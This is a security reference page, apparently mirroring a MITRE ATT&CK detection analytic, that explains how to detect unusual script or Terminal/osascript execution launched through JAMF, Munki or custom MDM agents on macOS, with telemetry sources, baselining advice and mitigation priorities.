AN0625: Analytic 0625
Detects script or binary execution initiated via JAMF, Munki, or custom MDM agents outside of baseline, or JAMF launching new Terminal or osascript processes from remote command payloads.
Analyst context for executives and security teams
AN0625 is a macOS-focused detection analytic for spotting script or binary execution launched through JAMF, Munki, or custom MDM agents when that activity falls outside the organization’s normal baseline. This matters because MDM and software management tooling is trusted infrastructure: if remote commands or management agents start unusual Terminal, osascript, script, or binary activity, the event may look administrative unless teams have a known-good baseline and sufficient endpoint telemetry.
Executive priority
Treat this as a control-validation issue for macOS fleet governance. Leaders should ask whether MDM-driven execution is logged, baselined, change-controlled, and reviewable during an incident. The business risk is not that JAMF or Munki are inherently malicious, but that trusted management channels can create high-confidence administrative noise unless security teams can distinguish approved maintenance from abnormal remote execution.
Technical view
For SOC and detection engineering teams, validate visibility into macOS process creation where the parent or initiator is JAMF, Munki, or a custom MDM agent. Focus on execution that is outside the normal software deployment or administration baseline, especially JAMF-initiated launches of Terminal or osascript from remote command payloads. Because ATT&CK provides no detailed detection logic for this analytic, local baselining is essential: compare process names, parent-child relationships, command lines where available, executing user or service context, host groups, timing, and change-ticket context.
Likely telemetry
- macOS process creation events with parent-child process relationships
- Command-line or script execution metadata where available
- MDM/JAMF/Munki remote command and policy execution logs
- Endpoint security or EDR telemetry from managed macOS hosts
- Administrative audit logs for MDM console activity and policy changes
Detection direction
- Build a baseline of expected JAMF, Munki, and custom MDM agent execution by host group, policy, package, administrator workflow, and maintenance window.
- Alert on unusual child processes from MDM agents, particularly Terminal or osascript when launched by JAMF remote command payloads, while tuning known administrative workflows.
- Correlate endpoint process telemetry with MDM policy execution and administrator audit logs to separate approved software management from abnormal execution.
- Review false positives from legitimate helpdesk actions, software deployment tasks, emergency maintenance, and scripted remediation jobs.
- Identify blind spots where macOS command-line capture, MDM audit logs, or custom agent logs are incomplete or not centrally retained.
Mitigation priorities
- Enforce change control and approval for remote command, script, and package execution through macOS management tooling.
- Limit MDM administrative privileges to required personnel and roles, and review access periodically.
- Maintain documented baselines for expected JAMF, Munki, and custom MDM agent behavior across different macOS device groups.
- Centralize and retain MDM audit logs and macOS endpoint process telemetry for investigation and compliance evidence.
- Review custom MDM agents and scripts for ownership, signing or integrity controls where applicable, and operational necessity.
Analyst notes and limits
This object is a detection analytic, not a technique description. Its value is strongest for organizations with managed macOS fleets using JAMF, Munki, or custom MDM agents. The key defensive decision is whether trusted management tooling is observable enough to support incident triage and whether abnormal remote execution can be separated from routine administration.
ATT&CK supplies no official detection logic, no tactics, and no relationship context for this object. Conclusions must therefore remain limited to the provided macOS platform and the named management tools and behaviors. Local environment baselines, logging configuration, and administrative processes are required to determine practical coverage.
Analytic 0625
Detects script or binary execution initiated via JAMF, Munki, or custom MDM agents outside of baseline, or JAMF launching new Terminal or osascript processes from remote command payloads.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 7591e731c887… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN0625Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.